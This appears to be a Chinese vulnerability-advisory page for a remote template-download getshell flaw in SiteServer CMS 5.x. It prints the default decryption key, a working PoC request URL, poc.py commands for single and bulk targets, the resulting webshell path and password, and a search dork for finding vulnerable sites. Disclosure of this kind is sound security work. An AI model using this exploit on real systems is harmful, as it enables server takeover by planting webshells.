Siteserver CMS 远程模板下载Getshell漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

SiteServerCMS-Remote-download-Getshell-vulnerability SiteServerCMS 远程模板下载Getshell漏洞 avatar 漏洞缺陷是由于后台模板下载位置未对用户权限进行校验,且 ajaxOtherService中的downloadUrl参数可控,导致getshell,目前经过测试发现对5.0版本包含5.0以下通杀.先调用了DecryptStringBySecretKey函数将downloadurl先进行了解密,之后调用SiteTemplateDownload函数进行模板下载并自解压。 且SecretKey在5.0是默认值 vEnfkn16t8aeaZKG3a4Gl9UUlzf4vgqU9xwh8ZV5 References Author:1u0hun 简记野生应急捕获到的siteserver远程模板下载Getshell漏洞 Affected Version SiteServerCMS 5.x SiteServerCMS 4.x(测试没通过) PoC Author:We1h0@PoxTeam http://localhost/SiteServer/Ajax/ajaxOtherService.aspx?type=SiteTemplateDownload&userKeyPrefix=test&downloadUrl=aZlBAFKTavCnFX10p8sNYfr9FRNHM0slash0XP8EW1kEnDr4pNGA7T2XSz0yCY0add0MS3NiuXiz7rZruw8zMDybqtdhCgxw7u0ZCkLl9cxsma6ZWqYd0G56lB6242DFnwb6xxK4AudqJ0add0gNU9tDxOqBwAd37smw0equals00equals0&directoryName=sectest python2 poc.py -u http://localhost avatar python2 poc.py -f url.txt Ps:注意最后面没/ WebShell:http://localhost/SiteFiles/SiteTemplates/sectest/include.aspx PassWord:admin 搜索引擎关键字: inurl:/sitefiles/services...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息